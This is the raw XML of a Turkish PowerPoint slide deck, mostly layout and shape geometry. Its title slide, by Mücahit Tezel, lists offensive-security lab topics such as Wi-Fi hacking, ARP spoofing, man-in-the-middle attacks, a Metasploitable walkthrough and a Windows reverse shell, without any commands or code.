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6" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="360" r:id="rId3"/>
    <p:sldId id="334" r:id="rId4"/>
    <p:sldId id="335" r:id="rId5"/>
    <p:sldId id="336" r:id="rId6"/>
    <p:sldId id="337" r:id="rId7"/>
    <p:sldId id="341" r:id="rId8"/>
    <p:sldId id="339" r:id="rId9"/>
    <p:sldId id="338" r:id="rId10"/>
    <p:sldId id="340" r:id="rId11"/>
    <p:sldId id="359" r:id="rId12"/>
    <p:sldId id="342" r:id="rId13"/>
    <p:sldId id="343" r:id="rId14"/>
    <p:sldId id="348" r:id="rId15"/>
    <p:sldId id="345" r:id="rId16"/>
    <p:sldId id="349" r:id="rId17"/>
    <p:sldId id="346" r:id="rId18"/>
    <p:sldId id="347" r:id="rId19"/>
    <p:sldId id="262" r:id="rId20"/>
    <p:sldId id="261" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="265" r:id="rId23"/>
    <p:sldId id="264" r:id="rId24"/>
    <p:sldId id="267" r:id="rId25"/>
    <p:sldId id="257" r:id="rId26"/>
    <p:sldId id="258" r:id="rId27"/>
    <p:sldId id="259" r:id="rId28"/>
    <p:sldId id="260" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="271" r:id="rId31"/>
    <p:sldId id="272" r:id="rId32"/>
    <p:sldId id="273" r:id="rId33"/>
    <p:sldId id="274" r:id="rId34"/>
    <p:sldId id="275" r:id="rId35"/>
    <p:sldId id="266" r:id="rId36"/>
    <p:sldId id="276" r:id="rId37"/>
    <p:sldId id="277" r:id="rId38"/>
    <p:sldId id="278" r:id="rId39"/>
    <p:sldId id="279" r:id="rId40"/>
    <p:sldId id="280" r:id="rId41"/>
    <p:sldId id="281" r:id="rId42"/>
    <p:sldId id="286" r:id="rId43"/>
    <p:sldId id="296" r:id="rId44"/>
    <p:sldId id="297" r:id="rId45"/>
    <p:sldId id="298" r:id="rId46"/>
    <p:sldId id="299" r:id="rId47"/>
    <p:sldId id="301" r:id="rId48"/>
    <p:sldId id="287" r:id="rId49"/>
    <p:sldId id="289" r:id="rId50"/>
    <p:sldId id="294" r:id="rId51"/>
    <p:sldId id="302" r:id="rId52"/>
    <p:sldId id="288" r:id="rId53"/>
    <p:sldId id="290" r:id="rId54"/>
    <p:sldId id="291" r:id="rId55"/>
    <p:sldId id="292" r:id="rId56"/>
    <p:sldId id="303" r:id="rId57"/>
    <p:sldId id="304" r:id="rId58"/>
    <p:sldId id="305" r:id="rId59"/>
    <p:sldId id="310" r:id="rId60"/>
    <p:sldId id="313" r:id="rId61"/>
    <p:sldId id="317" r:id="rId62"/>
    <p:sldId id="315" r:id="rId63"/>
    <p:sldId id="318" r:id="rId64"/>
    <p:sldId id="314" r:id="rId65"/>
    <p:sldId id="311" r:id="rId66"/>
    <p:sldId id="307" r:id="rId67"/>
    <p:sldId id="325" r:id="rId68"/>
    <p:sldId id="324" r:id="rId69"/>
    <p:sldId id="319" r:id="rId70"/>
    <p:sldId id="328" r:id="rId71"/>
    <p:sldId id="332" r:id="rId72"/>
    <p:sldId id="326" r:id="rId73"/>
    <p:sldId id="329" r:id="rId74"/>
    <p:sldId id="333" r:id="rId75"/>
    <p:sldId id="327" r:id="rId76"/>
    <p:sldId id="320" r:id="rId77"/>
    <p:sldId id="321" r:id="rId78"/>
    <p:sldId id="322" r:id="rId79"/>
    <p:sldId id="358"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5909"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="93" d="100"/>
          <a:sy n="93" d="100"/>
        </p:scale>
        <p:origin x="216"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1/26/23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53945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7393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3872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65240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7517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2722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17879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5745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125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13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1/26/23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819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1/26/23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885684071"/>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5" r:id="rId6"/>
    <p:sldLayoutId id="2147483890" r:id="rId7"/>
    <p:sldLayoutId id="2147483891" r:id="rId8"/>
    <p:sldLayoutId id="2147483892" r:id="rId9"/>
    <p:sldLayoutId id="2147483894" r:id="rId10"/>
    <p:sldLayoutId id="214748389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tr.wikipedia.org/wiki/TC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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2306AB6-9D65-4F8E-9FD7-C3F3A3DE3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ş simgeleriyle renkli açık bir ampul">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA85D299-01A7-8D67-6ABC-3611D98212CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="12046" b="7597"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="127234"/>
            <a:ext cx="12191980" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Freeform: Shape 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284C940E-7A1D-418E-A9E8-C9852CA8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1255" y="2996261"/>
            <a:ext cx="6310745" cy="3861739"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 5172027 w 6310745"/>
              <a:gd name="connsiteY0" fmla="*/ 351902 h 3861739"/>
              <a:gd name="connsiteX1" fmla="*/ 5173047 w 6310745"/>
              <a:gd name="connsiteY1" fmla="*/ 352987 h 3861739"/>
              <a:gd name="connsiteX2" fmla="*/ 5177471 w 6310745"/>
              <a:gd name="connsiteY2" fmla="*/ 352581 h 3861739"/>
              <a:gd name="connsiteX3" fmla="*/ 2969865 w 6310745"/>
              <a:gd name="connsiteY3" fmla="*/ 91462 h 3861739"/>
              <a:gd name="connsiteX4" fmla="*/ 2918830 w 6310745"/>
              <a:gd name="connsiteY4" fmla="*/ 95401 h 3861739"/>
              <a:gd name="connsiteX5" fmla="*/ 1957331 w 6310745"/>
              <a:gd name="connsiteY5" fmla="*/ 323658 h 3861739"/>
              <a:gd name="connsiteX6" fmla="*/ 413011 w 6310745"/>
              <a:gd name="connsiteY6" fmla="*/ 1429370 h 3861739"/>
              <a:gd name="connsiteX7" fmla="*/ 88087 w 6310745"/>
              <a:gd name="connsiteY7" fmla="*/ 2204577 h 3861739"/>
              <a:gd name="connsiteX8" fmla="*/ 109862 w 6310745"/>
              <a:gd name="connsiteY8" fmla="*/ 2159496 h 3861739"/>
              <a:gd name="connsiteX9" fmla="*/ 566286 w 6310745"/>
              <a:gd name="connsiteY9" fmla="*/ 1369352 h 3861739"/>
              <a:gd name="connsiteX10" fmla="*/ 1648059 w 6310745"/>
              <a:gd name="connsiteY10" fmla="*/ 484837 h 3861739"/>
              <a:gd name="connsiteX11" fmla="*/ 2969865 w 6310745"/>
              <a:gd name="connsiteY11" fmla="*/ 91462 h 3861739"/>
              <a:gd name="connsiteX12" fmla="*/ 3495357 w 6310745"/>
              <a:gd name="connsiteY12" fmla="*/ 893 h 3861739"/>
              <a:gd name="connsiteX13" fmla="*/ 3941913 w 6310745"/>
              <a:gd name="connsiteY13" fmla="*/ 37963 h 3861739"/>
              <a:gd name="connsiteX14" fmla="*/ 5299614 w 6310745"/>
              <a:gd name="connsiteY14" fmla="*/ 324201 h 3861739"/>
              <a:gd name="connsiteX15" fmla="*/ 6213700 w 6310745"/>
              <a:gd name="connsiteY15" fmla="*/ 666307 h 3861739"/>
              <a:gd name="connsiteX16" fmla="*/ 6310745 w 6310745"/>
              <a:gd name="connsiteY16" fmla="*/ 718092 h 3861739"/>
              <a:gd name="connsiteX17" fmla="*/ 6310745 w 6310745"/>
              <a:gd name="connsiteY17" fmla="*/ 786964 h 3861739"/>
              <a:gd name="connsiteX18" fmla="*/ 6223734 w 6310745"/>
              <a:gd name="connsiteY18" fmla="*/ 739515 h 3861739"/>
              <a:gd name="connsiteX19" fmla="*/ 5436559 w 6310745"/>
              <a:gd name="connsiteY19" fmla="*/ 427942 h 3861739"/>
              <a:gd name="connsiteX20" fmla="*/ 5314925 w 6310745"/>
              <a:gd name="connsiteY20" fmla="*/ 390465 h 3861739"/>
              <a:gd name="connsiteX21" fmla="*/ 5198564 w 6310745"/>
              <a:gd name="connsiteY21" fmla="*/ 357468 h 3861739"/>
              <a:gd name="connsiteX22" fmla="*/ 5826636 w 6310745"/>
              <a:gd name="connsiteY22" fmla="*/ 619266 h 3861739"/>
              <a:gd name="connsiteX23" fmla="*/ 6125359 w 6310745"/>
              <a:gd name="connsiteY23" fmla="*/ 778370 h 3861739"/>
              <a:gd name="connsiteX24" fmla="*/ 6310745 w 6310745"/>
              <a:gd name="connsiteY24" fmla="*/ 896973 h 3861739"/>
              <a:gd name="connsiteX25" fmla="*/ 6310745 w 6310745"/>
              <a:gd name="connsiteY25" fmla="*/ 3861739 h 3861739"/>
              <a:gd name="connsiteX26" fmla="*/ 974639 w 6310745"/>
              <a:gd name="connsiteY26" fmla="*/ 3861739 h 3861739"/>
              <a:gd name="connsiteX27" fmla="*/ 719986 w 6310745"/>
              <a:gd name="connsiteY27" fmla="*/ 3659957 h 3861739"/>
              <a:gd name="connsiteX28" fmla="*/ 299202 w 6310745"/>
              <a:gd name="connsiteY28" fmla="*/ 3177626 h 3861739"/>
              <a:gd name="connsiteX29" fmla="*/ 52873 w 6310745"/>
              <a:gd name="connsiteY29" fmla="*/ 2564820 h 3861739"/>
              <a:gd name="connsiteX30" fmla="*/ 21743 w 6310745"/>
              <a:gd name="connsiteY30" fmla="*/ 2457276 h 3861739"/>
              <a:gd name="connsiteX31" fmla="*/ 15788 w 6310745"/>
              <a:gd name="connsiteY31" fmla="*/ 2193035 h 3861739"/>
              <a:gd name="connsiteX32" fmla="*/ 1087523 w 6310745"/>
              <a:gd name="connsiteY32" fmla="*/ 695306 h 3861739"/>
              <a:gd name="connsiteX33" fmla="*/ 2765215 w 6310745"/>
              <a:gd name="connsiteY33" fmla="*/ 56158 h 3861739"/>
              <a:gd name="connsiteX34" fmla="*/ 3120078 w 6310745"/>
              <a:gd name="connsiteY34" fmla="*/ 15422 h 3861739"/>
              <a:gd name="connsiteX35" fmla="*/ 3495357 w 6310745"/>
              <a:gd name="connsiteY35" fmla="*/ 893 h 386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10745" h="3861739">
                <a:moveTo>
                  <a:pt x="5172027" y="351902"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5172027" y="351902"/>
                  <a:pt x="5172027" y="352852"/>
                  <a:pt x="5173047" y="352987"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5177471" y="352581"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="2969865" y="91462"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2952701" y="89711"/>
                  <a:pt x="2935264" y="91055"/>
                  <a:pt x="2918830" y="95401"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2586081" y="133611"/>
                  <a:pt x="2262146" y="210506"/>
                  <a:pt x="1957331" y="323658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1300170" y="565494"/>
                  <a:pt x="773488" y="924243"/>
                  <a:pt x="413011" y="1429370"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="241125" y="1667934"/>
                  <a:pt x="130650" y="1931482"/>
                  <a:pt x="88087" y="2204577"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96253" y="2189777"/>
                  <a:pt x="103398" y="2174704"/>
                  <a:pt x="109862" y="2159496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="227584" y="1883441"/>
                  <a:pt x="374053" y="1617978"/>
                  <a:pt x="566286" y="1369352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="843916" y="1009789"/>
                  <a:pt x="1197929" y="710108"/>
                  <a:pt x="1648059" y="484837"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2053957" y="281700"/>
                  <a:pt x="2497621" y="159899"/>
                  <a:pt x="2969865" y="91462"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="3495357" y="893"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3633661" y="-4539"/>
                  <a:pt x="3787957" y="15693"/>
                  <a:pt x="3941913" y="37963"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4403949" y="104770"/>
                  <a:pt x="4858161" y="195339"/>
                  <a:pt x="5299614" y="324201"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5617945" y="417079"/>
                  <a:pt x="5925559" y="526685"/>
                  <a:pt x="6213700" y="666307"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6310745" y="718092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6310745" y="786964"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6223734" y="739515"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5975170" y="615379"/>
                  <a:pt x="5710361" y="515015"/>
                  <a:pt x="5436559" y="427942"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5396292" y="415002"/>
                  <a:pt x="5355753" y="402509"/>
                  <a:pt x="5314925" y="390465"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5276307" y="379059"/>
                  <a:pt x="5237351" y="368468"/>
                  <a:pt x="5198564" y="357468"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5414393" y="434473"/>
                  <a:pt x="5624129" y="521907"/>
                  <a:pt x="5826636" y="619266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5929344" y="669507"/>
                  <a:pt x="6029097" y="722388"/>
                  <a:pt x="6125359" y="778370"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6310745" y="896973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6310745" y="3861739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974639" y="3861739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719986" y="3659957"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="556844" y="3515259"/>
                  <a:pt x="415052" y="3355506"/>
                  <a:pt x="299202" y="3177626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="173197" y="2986301"/>
                  <a:pt x="89840" y="2778941"/>
                  <a:pt x="52873" y="2564820"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46170" y="2528361"/>
                  <a:pt x="35760" y="2492390"/>
                  <a:pt x="21743" y="2457276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-12282" y="2369287"/>
                  <a:pt x="-34" y="2280753"/>
                  <a:pt x="15788" y="2193035"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125343" y="1581179"/>
                  <a:pt x="505554" y="1091397"/>
                  <a:pt x="1087523" y="695306"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1574397" y="363308"/>
                  <a:pt x="2138335" y="155961"/>
                  <a:pt x="2765215" y="56158"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2882595" y="37419"/>
                  <a:pt x="3000997" y="24655"/>
                  <a:pt x="3120078" y="15422"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3239161" y="6188"/>
                  <a:pt x="3356711" y="2250"/>
                  <a:pt x="3495357" y="893"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="EFF371">
              <a:alpha val="91000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Başlık 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DCEEC33-9F5E-83CD-E7A8-0B66A496F583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6206366" y="3273029"/>
            <a:ext cx="5982586" cy="2432389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Spoofing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> Attack</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>he</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>iddle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(Ortadaki </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dam Sal.)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> Makine Çözümü</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Windows(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Trojen-Reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> Shell)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="tr-TR" sz="2800" b="1" dirty="0">
                <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="tr-TR" sz="2800" b="1" dirty="0">
              <a:latin typeface="American Typewriter Condensed" panose="02090606020004020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Al Bayan Plain" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Alt Başlık 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D38401-9283-E77D-E5EA-883230FA9F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553240" y="5559518"/>
            <a:ext cx="4569248" cy="555608"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="tr-TR" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mücahit Tezel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E0F698-EDF5-464C-B466-8D34B8AF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9179" y="5344820"/>
            <a:ext cx="3994793" cy="27432"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3994793"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX1" fmla="*/ 745695 w 3994793"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX2" fmla="*/ 1451441 w 3994793"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX3" fmla="*/ 2157188 w 3994793"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX4" fmla="*/ 2703143 w 3994793"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX5" fmla="*/ 3289046 w 3994793"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX6" fmla="*/ 3994793 w 3994793"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 27432"/>
              <a:gd name="connsiteX7" fmla="*/ 3994793 w 3994793"/>
              <a:gd name="connsiteY7" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX8" fmla="*/ 3328994 w 3994793"/>
              <a:gd name="connsiteY8" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX9" fmla="*/ 2783039 w 3994793"/>
              <a:gd name="connsiteY9" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX10" fmla="*/ 2237084 w 3994793"/>
              <a:gd name="connsiteY10" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX11" fmla="*/ 1531337 w 3994793"/>
              <a:gd name="connsiteY11" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX12" fmla="*/ 945434 w 3994793"/>
              <a:gd name="connsiteY12" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX13" fmla="*/ 0 w 3994793"/>
              <a:gd name="connsiteY13" fmla="*/ 27432 h 27432"/>
              <a:gd name="connsiteX14" fmla="*/ 0 w 3994793"/>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4793" h="27432" fill="none" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="285474" y="-22732"/>
                  <a:pt x="421546" y="-1893"/>
                  <a:pt x="745695" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1069844" y="1893"/>
                  <a:pt x="1267051" y="4066"/>
                  <a:pt x="1451441" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1635831" y="-4066"/>
                  <a:pt x="1865269" y="3287"/>
                  <a:pt x="2157188" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2449107" y="-3287"/>
                  <a:pt x="2473776" y="-12720"/>
                  <a:pt x="2703143" y="0"/>
                </a:cubicBezTo>
